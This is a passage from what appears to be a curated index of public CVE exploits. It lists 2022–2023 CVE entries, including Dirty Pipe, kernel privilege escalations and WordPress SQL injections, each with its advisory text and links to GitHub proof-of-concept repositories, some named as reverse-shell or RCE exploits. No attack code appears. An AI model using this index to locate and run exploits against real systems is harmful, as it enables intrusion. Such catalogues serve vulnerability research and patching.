an attacker to authenticate as an arbitrary user because a session token can be sent to the /auth endpoint. NOTE: this module is not part of freescout-helpdesk/freescout on GitHub. + + +- [squ1dw3rm/CVE-2023-52268](https://github.com/squ1dw3rm/CVE-2023-52268) + +### CVE-2023-52654 (2024-05-09) + +In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/af_unix: disable sending io_uring over sockets\n\nFile reference cycles have caused lots of problems for io_uring\nin the past, and it still doesn't work exactly right and races with\nunix_stream_read_generic(). The safest fix would be to completely\ndisallow sending io_uring files via sockets via SCM_RIGHT, so there\nare no possible cycles invloving registered files and thus rendering\nSCM accounting on the io_uring side unnecessary. + + +- [FoxyProxys/CVE-2023-52654](https://github.com/FoxyProxys/CVE-2023-52654) + +### CVE-2023-52709 +- [KevinMitchell-OSWP-CISSP/CVE-2023-52709-PoC](https://github.com/KevinMitchell-OSWP-CISSP/CVE-2023-52709-PoC) + ## 2022 +### CVE-2022-0155 (2022-01-10) + +follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor + + +- [coana-tech/CVE-2022-0155-PoC](https://github.com/coana-tech/CVE-2022-0155-PoC) + +### CVE-2022-0165 (2022-03-14) + +The Page Builder KingComposer WordPress plugin through 2.9.6 does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users + + +- [K3ysTr0K3R/CVE-2022-0165-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-0165-EXPLOIT) +- [Cappricio-Securities/CVE-2022-0165](https://github.com/Cappricio-Securities/CVE-2022-0165) + +### CVE-2022-0185 (2022-02-11) + +A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length. An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a filesystem that does not support the Filesystem Context API (and thus fallbacks to legacy handling) could use this flaw to escalate their privileges on the system. + + +- [Crusaders-of-Rust/CVE-2022-0185](https://github.com/Crusaders-of-Rust/CVE-2022-0185) +- [discordianfish/cve-2022-0185-crash-poc](https://github.com/discordianfish/cve-2022-0185-crash-poc) +- [khaclep007/CVE-2022-0185](https://github.com/khaclep007/CVE-2022-0185) +- [chenaotian/CVE-2022-0185](https://github.com/chenaotian/CVE-2022-0185) +- [veritas501/CVE-2022-0185-PipeVersion](https://github.com/veritas501/CVE-2022-0185-PipeVersion) +- [featherL/CVE-2022-0185-exploit](https://github.com/featherL/CVE-2022-0185-exploit) +- [dcheng69/CVE-2022-0185-Case-Study](https://github.com/dcheng69/CVE-2022-0185-Case-Study) + +### CVE-2022-0219 (2022-01-20) + +Improper Restriction of XML External Entity Reference in GitHub repository skylot/jadx prior to 1.3.2. + + +- [Haxatron/CVE-2022-0219](https://github.com/Haxatron/CVE-2022-0219) + +### CVE-2022-0236 (2022-01-18) + +The WP Import Export WordPress plugin (both free and premium versions) is vulnerable to unauthenticated sensitive data disclosure due to a missing capability check on the download function wpie_process_file_download found in the ~/includes/classes/class-wpie-general.php file. This made it possible for unauthenticated attackers to download any imported or exported information from a vulnerable site which can contain sensitive information like user data. This affects versions up to, and including, 3.9.15. + + +- [qurbat/CVE-2022-0236](https://github.com/qurbat/CVE-2022-0236) +- [xiska62314/CVE-2022-0236](https://github.com/xiska62314/CVE-2022-0236) + +### CVE-2022-0265 (2022-03-03) + +Improper Restriction of XML External Entity Reference in GitHub repository hazelcast/hazelcast in 5.1-BETA-1. + + +- [achuna33/CVE-2022-0265](https://github.com/achuna33/CVE-2022-0265) + +### CVE-2022-0316 (2023-01-23) + +The WeStand WordPress theme before 2.1, footysquare WordPress theme, aidreform WordPress theme, statfort WordPress theme, club-theme WordPress theme, kingclub-theme WordPress theme, spikes WordPress theme, spikes-black WordPress theme, soundblast WordPress theme, bolster WordPress theme from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server. + + +- [KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit](https://github.com/KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit) + +### CVE-2022-0332 (2022-01-25) + +A flaw was found in Moodle in versions 3.11 to 3.11.4. An SQL injection risk was identified in the h5p activity web service responsible for fetching user attempt data. + + +- [numanturle/CVE-2022-0332](https://github.com/numanturle/CVE-2022-0332) + +### CVE-2022-0337 (2023-01-02) + +Inappropriate implementation in File System API in Google Chrome on Windows prior to 97.0.4692.71 allowed a remote attacker to obtain potentially sensitive information via a crafted HTML page. (Chrome security severity: High) + + +- [Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera](https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera) +- [maldev866/ChExp-CVE-2022-0337-](https://github.com/maldev866/ChExp-CVE-2022-0337-) +- [zer0ne1/CVE-2022-0337-RePoC](https://github.com/zer0ne1/CVE-2022-0337-RePoC) + +### CVE-2022-0412 (2022-02-28) + +The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks + + +- [TcherB31/CVE-2022-0412_Exploit](https://github.com/TcherB31/CVE-2022-0412_Exploit) + +### CVE-2022-0435 (2022-03-25) + +A stack overflow flaw was found in the Linux kernel's TIPC protocol functionality in the way a user sends a packet with malicious content where the number of domain member nodes is higher than the 64 allowed. This flaw allows a remote user to crash the system or possibly escalate their privileges if they have access to the TIPC network. + + +- [wlswotmd/CVE-2022-0435](https://github.com/wlswotmd/CVE-2022-0435) + +### CVE-2022-0439 (2022-03-07) + +The Email Subscribers & Newsletters WordPress plugin before 5.3.2 does not correctly escape the `order` and `orderby` parameters to the `ajax_fetch_report_list` action, making it vulnerable to blind SQL injection attacks by users with roles as low as Subscriber. Further, it does not have any CSRF protection in place for the action, allowing an attacker to trick any logged in user to perform the action by clicking a link. + + +- [RandomRobbieBF/CVE-2022-0439](https://github.com/RandomRobbieBF/CVE-2022-0439) + +### CVE-2022-0441 (2022-03-07) + +The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin + + +- [biulove0x/CVE-2022-0441](https://github.com/biulove0x/CVE-2022-0441) +- [SDragon1205/cve-2022-0441](https://github.com/SDragon1205/cve-2022-0441) +- [tegal1337/CVE-2022-0441](https://github.com/tegal1337/CVE-2022-0441) +- [kyukazamiqq/CVE-2022-0441](https://github.com/kyukazamiqq/CVE-2022-0441) + +### CVE-2022-0482 (2022-03-09) + +Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments prior to 1.4.3. + + +- [Acceis/exploit-CVE-2022-0482](https://github.com/Acceis/exploit-CVE-2022-0482) +- [mija-pilkaite/CVE-2022-0482_exploit](https://github.com/mija-pilkaite/CVE-2022-0482_exploit) + +### CVE-2022-0486 (2022-05-17) + +Improper file permissions in the CommandPost, Collector, Sensor, and Sandbox components of Fidelis Network and Deception enables an attacker with local, administrative access to the CLI to modify affected files and enable escalation of privileges equivalent to the root user. The vulnerability is present in Fidelis Network and Deception versions prior to 9.4.5. Patches and updates are available to address this vulnerability. + + +- [henryreed/CVE-2022-0486](https://github.com/henryreed/CVE-2022-0486) + +### CVE-2022-0492 (2022-03-03) + +A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly. + + +- [PaloAltoNetworks/can-ctr-escape-cve-2022-0492](https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492) +- [SofianeHamlaoui/CVE-2022-0492-Checker](https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker) +- [chenaotian/CVE-2022-0492](https://github.com/chenaotian/CVE-2022-0492) +- [bb33bb/CVE-2022-0492](https://github.com/bb33bb/CVE-2022-0492) +- [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492) +- [yoeelingBin/CVE-2022-0492-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0492-Container-Escape) +- [T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC](https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC) + +### CVE-2022-0529 (2022-02-09) + +A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. + + +- [nanaao/unzip_poc](https://github.com/nanaao/unzip_poc) +- [ByteHackr/unzip_poc](https://github.com/ByteHackr/unzip_poc) + +### CVE-2022-0540 (2022-04-20) + +A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. + + +- [Pear1y/CVE-2022-0540-RCE](https://github.com/Pear1y/CVE-2022-0540-RCE) + +### CVE-2022-0543 (2022-02-18) + +It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution. + + +- [0x7eTeam/CVE-2022-0543](https://github.com/0x7eTeam/CVE-2022-0543) +- [z92g/CVE-2022-0543](https://github.com/z92g/CVE-2022-0543) +- [JacobEbben/CVE-2022-0543](https://github.com/JacobEbben/CVE-2022-0543) +- [SiennaSkies/redisHack](https://github.com/SiennaSkies/redisHack) + +### CVE-2022-0591 (2022-03-21) + +The FormCraft WordPress plugin before 3.8.28 does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users + + +- [im-hanzou/FC3er](https://github.com/im-hanzou/FC3er) + +### CVE-2022-0666 (2022-02-18) + +CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11. + + +- [keyboardancer/CVE-2022-0666](https://github.com/keyboardancer/CVE-2022-0666) + +### CVE-2022-0725 (2022-03-07) + +A flaw was found in keepass. The vulnerability occurs due to logging the plain text passwords in system log and leads to an Information Exposure vulnerability. This flaw allows an attacker to interact and read sensitive passwords and logs. + + +- [ByteHackr/keepass_poc](https://github.com/ByteHackr/keepass_poc) + +### CVE-2022-0739 (2022-03-21) + +The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection + + +- [destr4ct/CVE-2022-0739](https://github.com/destr4ct/CVE-2022-0739) +- [Chris01s/CVE-2022-0739](https://github.com/Chris01s/CVE-2022-0739) +- [BKreisel/CVE-2022-0739](https://github.com/BKreisel/CVE-2022-0739) +- [hadrian3689/wp_bookingpress_1.0.11](https://github.com/hadrian3689/wp_bookingpress_1.0.11) +- [G01d3nW01f/CVE-2022-0739](https://github.com/G01d3nW01f/CVE-2022-0739) +- [viardant/CVE-2022-0739](https://github.com/viardant/CVE-2022-0739) +- [ElGanz0/CVE-2022-0739](https://github.com/ElGanz0/CVE-2022-0739) +- [lhamouche/Bash-exploit-for-CVE-2022-0739](https://github.com/lhamouche/Bash-exploit-for-CVE-2022-0739) + +### CVE-2022-0778 (2022-03-15) + +The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). + + +- [drago-96/CVE-2022-0778](https://github.com/drago-96/CVE-2022-0778) +- [yywing/cve-2022-0778](https://github.com/yywing/cve-2022-0778) +- [jkakavas/CVE-2022-0778-POC](https://github.com/jkakavas/CVE-2022-0778-POC) +- [0xUhaw/CVE-2022-0778](https://github.com/0xUhaw/CVE-2022-0778) +- [Trinadh465/openssl-1.1.1g_CVE-2022-0778](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2022-0778) +- [jeongjunsoo/CVE-2022-0778](https://github.com/jeongjunsoo/CVE-2022-0778) +- [hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778](https://github.com/hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778) + +### CVE-2022-0811 (2022-03-16) + +A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed. + + +- [spiarh/webhook-cve-2022-0811](https://github.com/spiarh/webhook-cve-2022-0811) + +### CVE-2022-0824 (2022-03-02) + +Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990. + + +- [faisalfs10x/Webmin-CVE-2022-0824-revshell](https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell) +- [honypot/CVE-2022-0824](https://github.com/honypot/CVE-2022-0824) +- [pizza-power/golang-webmin-CVE-2022-0824-revshell](https://github.com/pizza-power/golang-webmin-CVE-2022-0824-revshell) +- [gokul-ramesh/WebminRCE-exploit](https://github.com/gokul-ramesh/WebminRCE-exploit) + +### CVE-2022-0847 (2022-03-07) + +A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. + + +- [bbaranoff/CVE-2022-0847](https://github.com/bbaranoff/CVE-2022-0847) +- [xndpxs/CVE-2022-0847](https://github.com/xndpxs/CVE-2022-0847) +- [r1is/CVE-2022-0847](https://github.com/r1is/CVE-2022-0847) +- [Arinerron/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit) +- [2xYuan/CVE-2022-0847](https://github.com/2xYuan/CVE-2022-0847) +- [crowsec-edtech/Dirty-Pipe](https://github.com/crowsec-edtech/Dirty-Pipe) +- [lucksec/CVE-2022-0847](https://github.com/lucksec/CVE-2022-0847) +- [si1ent-le/CVE-2022-0847](https://github.com/si1ent-le/CVE-2022-0847) +- [bohr777/cve-2022-0847dirtypipe-exploit](https://github.com/bohr777/cve-2022-0847dirtypipe-exploit) +- [ZZ-SOCMAP/CVE-2022-0847](https://github.com/ZZ-SOCMAP/CVE-2022-0847) +- [cspshivam/CVE-2022-0847-dirty-pipe-exploit](https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit) +- [febinrev/dirtypipez-exploit](https://github.com/febinrev/dirtypipez-exploit) +- [ahrixia/CVE_2022_0847](https://github.com/ahrixia/CVE_2022_0847) +- [knqyf263/CVE-2022-0847](https://github.com/knqyf263/CVE-2022-0847) +- [puckiestyle/CVE-2022-0847](https://github.com/puckiestyle/CVE-2022-0847) +- [0xIronGoat/dirty-pipe](https://github.com/0xIronGoat/dirty-pipe) +- [ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit) +- [mrchucu1/CVE-2022-0847-Docker](https://github.com/mrchucu1/CVE-2022-0847-Docker) +- [basharkey/CVE-2022-0847-dirty-pipe-checker](https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker) +- [4luc4rdr5290/CVE-2022-0847](https://github.com/4luc4rdr5290/CVE-2022-0847) +- [dadhee/CVE-2022-0847_DirtyPipeExploit](https://github.com/dadhee/CVE-2022-0847_DirtyPipeExploit) +- [Greetdawn/CVE-2022-0847-DirtyPipe](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe) +- [Al1ex/CVE-2022-0847](https://github.com/Al1ex/CVE-2022-0847) +- [Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit) +- [nanaao/Dirtypipe-exploit](https://github.com/nanaao/Dirtypipe-exploit) +- [AyoubNajim/cve-2022-0847dirtypipe-exploit](https://github.com/AyoubNajim/cve-2022-0847dirtypipe-exploit) +- [pentestblogin/pentestblog-CVE-2022-0847](https://github.com/pentestblogin/pentestblog-CVE-2022-0847) +- [gyaansastra/CVE-2022-0847](https://github.com/gyaansastra/CVE-2022-0847) +- [DataDog/dirtypipe-container-breakout-poc](https://github.com/DataDog/dirtypipe-container-breakout-poc) +- [babyshen/CVE-2022-0847](https://github.com/babyshen/CVE-2022-0847) +- [edsonjt81/CVE-2022-0847-Linux](https://github.com/edsonjt81/CVE-2022-0847-Linux) +- [chenaotian/CVE-2022-0847](https://github.com/chenaotian/CVE-2022-0847) +- [V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit) +- [al4xs/CVE-2022-0847-Dirty-Pipe](https://github.com/al4xs/CVE-2022-0847-Dirty-Pipe) +- [Greetdawn/CVE-2022-0847-DirtyPipe-](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe-) +- [crusoe112/DirtyPipePython](https://github.com/crusoe112/DirtyPipePython) +- [nanaao/dirtyPipe-automaticRoot](https://github.com/nanaao/dirtyPipe-automaticRoot) +- [arttnba3/CVE-2022-0847](https://github.com/arttnba3/CVE-2022-0847) +- [AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits) +- [sa-infinity8888/Dirty-Pipe-CVE-2022-0847](https://github.com/sa-infinity8888/Dirty-Pipe-CVE-2022-0847) +- [realbatuhan/dirtypipetester](https://github.com/realbatuhan/dirtypipetester) +- [CYB3RK1D/CVE-2022-0847-POC](https://github.com/CYB3RK1D/CVE-2022-0847-POC) +- [breachnix/dirty-pipe-poc](https://github.com/breachnix/dirty-pipe-poc) +- [Shotokhan/cve_2022_0847_shellcode](https://github.com/Shotokhan/cve_2022_0847_shellcode) +- [githublihaha/DirtyPIPE-CVE-2022-0847](https://github.com/githublihaha/DirtyPIPE-CVE-2022-0847) +- [MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker](https://github.com/MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker) +- [jpts/CVE-2022-0847-DirtyPipe-Container-Breakout](https://github.com/jpts/CVE-2022-0847-DirtyPipe-Container-Breakout) +- [LudovicPatho/CVE-2022-0847_dirty-pipe](https://github.com/LudovicPatho/CVE-2022-0847_dirty-pipe) +- [DanaEpp/pwncat_dirtypipe](https://github.com/DanaEpp/pwncat_dirtypipe) +- [tmoneypenny/CVE-2022-0847](https://github.com/tmoneypenny/CVE-2022-0847) +- [scopion/dirty-pipe](https://github.com/scopion/dirty-pipe) +- [stfnw/Debugging_Dirty_Pipe_CVE-2022-0847](https://github.com/stfnw/Debugging_Dirty_Pipe_CVE-2022-0847) +- [drapl0n/dirtypipe](https://github.com/drapl0n/dirtypipe) +- [mhanief/dirtypipe](https://github.com/mhanief/dirtypipe) +- [tufanturhan/CVE-2022-0847-L-nux-PrivEsc](https://github.com/tufanturhan/CVE-2022-0847-L-nux-PrivEsc) +- [rexpository/linux-privilege-escalation](https://github.com/rexpository/linux-privilege-escalation) +- [CPT-Jack-A-Castle/CVE-2022-0847](https://github.com/CPT-Jack-A-Castle/CVE-2022-0847) +- [isaiahsimeone/COMP3320-VAPT](https://github.com/isaiahsimeone/COMP3320-VAPT) +- [VinuKalana/DirtyPipe-CVE-2022-0847](https://github.com/VinuKalana/DirtyPipe-CVE-2022-0847) +- [ih3na/debian11-dirty_pipe-patcher](https://github.com/ih3na/debian11-dirty_pipe-patcher) +- [greenhandatsjtu/CVE-2022-0847-Container-Escape](https://github.com/greenhandatsjtu/CVE-2022-0847-Container-Escape) +- [jxpsx/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/jxpsx/CVE-2022-0847-DirtyPipe-Exploits) +- [Asbatel/CBDS_CVE-2022-0847_POC](https://github.com/Asbatel/CBDS_CVE-2022-0847_POC) +- [airbus-cert/dirtypipe-ebpf_detection](https://github.com/airbus-cert/dirtypipe-ebpf_detection) +- [edr1412/Dirty-Pipe](https://github.com/edr1412/Dirty-Pipe) +- [eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits) +- [EagleTube/CVE-2022-0847](https://github.com/EagleTube/CVE-2022-0847) +- [yoeelingBin/CVE-2022-0847-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0847-Container-Escape) +- [notl0cal/dpipe](https://github.com/notl0cal/dpipe) +- [Gustavo-Nogueira/Dirty-Pipe-Exploits](https://github.com/Gustavo-Nogueira/Dirty-Pipe-Exploits) +- [b4dboy17/Dirty-Pipe-Oneshot](https://github.com/b4dboy17/Dirty-Pipe-Oneshot) +- [edsonjt81/CVE-2022-0847-DirtyPipe-](https://github.com/edsonjt81/CVE-2022-0847-DirtyPipe-) +- [Turzum/ps-lab-cve-2022-0847](https://github.com/Turzum/ps-lab-cve-2022-0847) +- [qwert419/linux-](https://github.com/qwert419/linux-) +- [DataFox/CVE-2022-0847](https://github.com/DataFox/CVE-2022-0847) +- [pmihsan/Dirty-Pipe-CVE-2022-0847](https://github.com/pmihsan/Dirty-Pipe-CVE-2022-0847) +- [ajith737/Dirty-Pipe-CVE-2022-0847-POCs](https://github.com/ajith737/Dirty-Pipe-CVE-2022-0847-POCs) +- [mutur4/CVE-2022-0847](https://github.com/mutur4/CVE-2022-0847) +- [orsuprasad/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/orsuprasad/CVE-2022-0847-DirtyPipe-Exploits) +- [JlSakuya/CVE-2022-0847-container-escape](https://github.com/JlSakuya/CVE-2022-0847-container-escape) +- [jonathanbest7/cve-2022-0847](https://github.com/jonathanbest7/cve-2022-0847) +- [0xeremus/dirty-pipe-poc](https://github.com/0xeremus/dirty-pipe-poc) +- [h4ckm310n/CVE-2022-0847-eBPF](https://github.com/h4ckm310n/CVE-2022-0847-eBPF) +- [joeymeech/CVE-2022-0847-Exploit-Implementation](https://github.com/joeymeech/CVE-2022-0847-Exploit-Implementation) +- [pashayogi/DirtyPipe](https://github.com/pashayogi/DirtyPipe) +- [n3rada/DirtyPipe](https://github.com/n3rada/DirtyPipe) +- [ayushx007/CVE-2022-0847-dirty-pipe-checker](https://github.com/ayushx007/CVE-2022-0847-dirty-pipe-checker) +- [ayushx007/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/ayushx007/CVE-2022-0847-DirtyPipe-Exploits) +- [solomon12354/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus](https://github.com/solomon12354/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus) +- [letsr00t/CVE-2022-0847](https://github.com/letsr00t/CVE-2022-0847) +- [xsxtw/CVE-2022-0847](https://github.com/xsxtw/CVE-2022-0847) +- [muhammad1596/CVE-2022-0847-dirty-pipe-checker](https://github.com/muhammad1596/CVE-2022-0847-dirty-pipe-checker) +- [muhammad1596/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/muhammad1596/CVE-2022-0847-DirtyPipe-Exploits) + +### CVE-2022-0848 (2022-03-04) + +OS Command Injection in GitHub repository part-db/part-db prior to 0.5.11. + + +- [dskmehra/CVE-2022-0848](https://github.com/dskmehra/CVE-2022-0848) +- [Lay0us/CVE-2022-0848-RCE](https://github.com/Lay0us/CVE-2022-0848-RCE) + +### CVE-2022-0853 (2022-03-11) + +A flaw was found in JBoss-client. The vulnerability occurs due to a memory leak on the JBoss client-side, when using UserTransaction repeatedly and leads to information leakage vulnerability. + + +- [ByteHackr/CVE-2022-0853](https://github.com/ByteHackr/CVE-2022-0853) + +### CVE-2022-0918 (2022-03-16) + +A vulnerability was discovered in the 389 Directory Server that allows an unauthenticated attacker with network access to the LDAP port to cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection, no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing.\n\n + + +- [NathanMulbrook/CVE-2022-0918](https://github.com/NathanMulbrook/CVE-2022-0918) + +### CVE-2022-0944 (2022-03-15) + +Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1. + + +- [shhrew/CVE-2022-0944](https://github.com/shhrew/CVE-2022-0944) +- [Philip-Otter/CVE-2022-0944_RCE_Automation](https://github.com/Philip-Otter/CVE-2022-0944_RCE_Automation) +- [FlojBoj/CVE-2022-0944](https://github.com/FlojBoj/CVE-2022-0944) +- [0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944](https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944) +- [Robocopsita/CVE-2022-0944_RCE_POC](https://github.com/Robocopsita/CVE-2022-0944_RCE_POC) +- [toneillcodes/CVE-2022-0944](https://github.com/toneillcodes/CVE-2022-0944) +- [LipeOzyy/SQLPad-RCE-Exploit-CVE-2022-0944](https://github.com/LipeOzyy/SQLPad-RCE-Exploit-CVE-2022-0944) +- [0xDTC/SQLPad-6.10.0-Exploit-CVE-2022-0944](https://github.com/0xDTC/SQLPad-6.10.0-Exploit-CVE-2022-0944) + +### CVE-2022-0952 (2022-05-02) + +The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog. + + +- [RandomRobbieBF/CVE-2022-0952](https://github.com/RandomRobbieBF/CVE-2022-0952) + +### CVE-2022-0995 (2022-03-25) + +An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system. + + +- [Bonfee/CVE-2022-0995](https://github.com/Bonfee/CVE-2022-0995) +- [AndreevSemen/CVE-2022-0995](https://github.com/AndreevSemen/CVE-2022-0995) +- [1nzag/CVE-2022-0995](https://github.com/1nzag/CVE-2022-0995) + +### CVE-2022-0997 (2022-05-17) + +Improper file permissions in the CommandPost, Collector, and Sensor components of Fidelis Network and Deception enables an attacker with local, administrative access to the CLI to modify affected script files, which could result in arbitrary commands being run as root upon subsequent logon by a root user. The vulnerability is present in Fidelis Network and Deception versions prior to 9.4.5. Patches and updates are available to address this vulnerability. + + +- [henryreed/CVE-2022-0997](https://github.com/henryreed/CVE-2022-0997) + +### CVE-2022-1011 (2022-03-18) + +A use-after-free flaw was found in the Linux kernel’s FUSE filesystem in the way a user triggers write(). This flaw allows a local user to gain unauthorized access to data from the FUSE filesystem, resulting in privilege escalation. + + +- [xkaneiki/CVE-2022-1011](https://github.com/xkaneiki/CVE-2022-1011) + +### CVE-2022-1012 (2022-08-05) + +A memory leak problem was found in the TCP source port generation algorithm in net/ipv4/tcp.c due to the small table perturb size. This flaw may allow an attacker to information leak and may cause a denial of service problem. + + +- [nanopathi/Linux-4.19.72_CVE-2022-1012](https://github.com/nanopathi/Linux-4.19.72_CVE-2022-1012) + +### CVE-2022-1015 (2022-04-29) + +A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue. + + +- [pqlx/CVE-2022-1015](https://github.com/pqlx/CVE-2022-1015) +- [zanezhub/CVE-2022-1015-1016](https://github.com/zanezhub/CVE-2022-1015-1016) +- [shuttterman/bob_kern_exp1](https://github.com/shuttterman/bob_kern_exp1) +- [ysanatomic/CVE-2022-1015](https://github.com/ysanatomic/CVE-2022-1015) +- [wlswotmd/CVE-2022-1015](https://github.com/wlswotmd/CVE-2022-1015) +- [delsploit/CVE-2022-1015](https://github.com/delsploit/CVE-2022-1015) +- [pivik271/CVE-2022-1015](https://github.com/pivik271/CVE-2022-1015) +- [more-kohii/CVE-2022-1015](https://github.com/more-kohii/CVE-2022-1015) +- [0range1337/CVE-2022-1015](https://github.com/0range1337/CVE-2022-1015) +- [seadragnol/CVE-2022-1015](https://github.com/seadragnol/CVE-2022-1015) + +### CVE-2022-1026 (2022-04-04) + +Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function. + + +- [ac3lives/kyocera-cve-2022-1026](https://github.com/ac3lives/kyocera-cve-2022-1026) +- [flamebarke/nmap-printer-nse-scripts](https://github.com/flamebarke/nmap-printer-nse-scripts) +- 